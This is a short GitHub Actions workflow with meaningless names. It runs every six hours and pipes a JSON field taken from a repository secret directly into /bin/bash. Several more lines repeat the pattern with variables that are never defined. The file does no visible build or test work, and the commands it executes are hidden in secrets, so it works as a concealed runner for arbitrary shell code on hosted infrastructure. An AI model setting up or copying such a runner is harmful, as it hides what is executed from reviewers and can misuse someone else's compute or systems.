name: diaoyontsh

on:
  workflow_dispatch:
  schedule:
    - cron: '14 3/6 * * *'
jobs:  # 8278
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: diaoyontsh
        env:
          is5886: ${{ secrets.is5886 }}
        run: |
          echo $is5886 | jq -r .qc78030 | /bin/bash
          echo $pimpu0 | jq -r .st6036 | /bin/bash
          echo $ebml09 | jq -r .qwk17308 | /bin/bash
          echo $lurkc0495 | jq -r .fkw33167 | /bin/bash
          echo $mky3 | jq -r .jjc7093 | /bin/bash

